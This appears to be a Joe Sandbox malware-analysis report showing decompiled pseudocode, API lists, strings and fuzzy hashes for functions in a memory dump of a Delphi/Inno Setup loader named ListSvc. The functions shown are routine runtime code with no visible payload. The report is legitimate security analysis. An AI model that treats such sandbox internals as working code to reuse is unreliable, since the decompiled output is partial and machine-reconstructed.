Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}

0x0040aefd
0x0040aefe
0x0040af04
0x0040af0b
0x0040af0c
0x0040af11
0x0040af14
0x0040af27
0x0040af34
0x0040af37
0x0040af37
0x0040af3e
0x0040af41
0x0040af44
0x0040af51

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519

Uniqueness

Uniqueness Score: -1.00%

Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188

Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F

GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B

Strings

propsys.dll, xrefs: 004B5254
uxtheme.dll, xrefs: 004B51E8
setupapi.dll, xrefs: 004B521E
oleacc.dll, xrefs: 004B52A5
version.dll, xrefs: 004B52C0
clbcatq.dll, xrefs: 004B5311
hK, xrefs: 004B51A3
userenv.dll, xrefs: 004B5203
apphelp.dll, xrefs: 004B5239
SetProcessDEPPolicy, xrefs: 004B535A
dwmapi.dll, xrefs: 004B526F
SetDllDirectoryW, xrefs: 004B5182
comres.dll, xrefs: 004B52F6
profapi.dll, xrefs: 004B52DB
cryptbase.dll, xrefs: 004B528A
hK, xrefs: 004B51D6
ntmarta.dll, xrefs: 004B532C
SetSearchPathMode, xrefs: 004B5344
kernel32.dll, xrefs: 004B5141
SetDefaultDllDirectories, xrefs: 004B515C

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
API String ID: 2248137261-3182217745
Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A

Strings

Software\Borland\Delphi\Locales, xrefs: 0040AC2A
Software\CodeGear\Locales, xrefs: 0040ABD0, 0040ABEE
Software\Embarcadero\Locales, xrefs: 0040AB90, 0040ABB2
Software\Borland\Locales, xrefs: 0040AC0C

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E

Uniqueness

Uniqueness Score: -1.00%

Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x50392
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x50392
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4d4828
				_t4 = _t26 + 0x20; // 0x16182b
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4d4828
				_t7 = _t28 + 0x24; // 0xc8800
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x50392
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}

APIs

Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F

SetWindowLongW.USER32 ref: 004B641E

Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA

Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4

RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
DestroyWindow.USER32(00050392,004B6554), ref: 004B6514

Strings

STATIC, xrefs: 004B6400
/SL5="$%x,%d,%d,, xrefs: 004B645E
InnoSetupLdrWindow, xrefs: 004B63FB
(HM, xrefs: 004B6438, 004B6447

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: (HM$/SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3586484885-3576244072
Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
